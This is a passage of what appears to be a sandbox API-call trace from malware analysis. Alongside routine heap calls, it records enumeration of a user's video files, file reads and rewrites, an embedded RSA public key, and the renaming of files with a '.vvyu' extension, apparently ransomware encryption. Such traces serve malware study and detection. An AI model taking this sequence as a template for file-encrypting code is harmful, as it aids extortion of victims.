(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30be0 | out: hHeap=0x6a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.585] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x6c01, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x6c01, lpOverlapped=0x0) returned 1 [0190.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.586] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6c06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.586] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.587] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.588] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.588] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.588] CloseHandle (hObject=0x584) returned 1 [0190.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.590] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\QmnC3ePw1fV.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\qmnc3epw1fv.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\QmnC3ePw1fV.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\qmnc3epw1fv.mkv.vvyu")) returned 1 [0190.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.592] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.594] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcaaf7440, ftCreationTime.dwHighDateTime=0x1d8a0c4, ftLastAccessTime.dwLowDateTime=0x6b339510, ftLastAccessTime.dwHighDateTime=0x1d8a15e, ftLastWriteTime.dwLowDateTime=0x6b339510, ftLastWriteTime.dwHighDateTime=0x1d8a15e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SVKL6Wu5uab uSVqvA", cAlternateFileName="SVKL6W~1")) returned 1 [0190.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0190.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.595] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc85dc270, ftCreationTime.dwHighDateTime=0x1d8a33d, ftLastAccessTime.dwLowDateTime=0xcc80d20, ftLastAccessTime.dwHighDateTime=0x1d8a619, ftLastWriteTime.dwLowDateTime=0xcc80d20, ftLastWriteTime.dwHighDateTime=0x1d8a619, nFileSizeHigh=0x0, nFileSizeLow=0xd01a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tKv_jmwrxLF8d6FC.swf", cAlternateFileName="TKV_JM~1.SWF")) returned 1 [0190.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.596] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tKv_jmwrxLF8d6FC.swf") returned=".swf" [0190.596] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\tKv_jmwrxLF8d6FC.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\tkv_jmwrxlf8d6fc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.596] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=53274) returned 1 [0190.596] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.600] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcff4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.600] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.602] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.602] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xd01a, lpOverlapped=0x0) returned 1 [0190.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.603] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.603] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.604] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.604] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.604] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.604] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.604] GetLastError () returned 0x0 [0190.604] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.604] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.605] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.605] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.605] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd020) returned 0x2d45778 [0190.605] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30be0 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b98 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.606] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bb0 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b98 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.608] HeapFree (in: 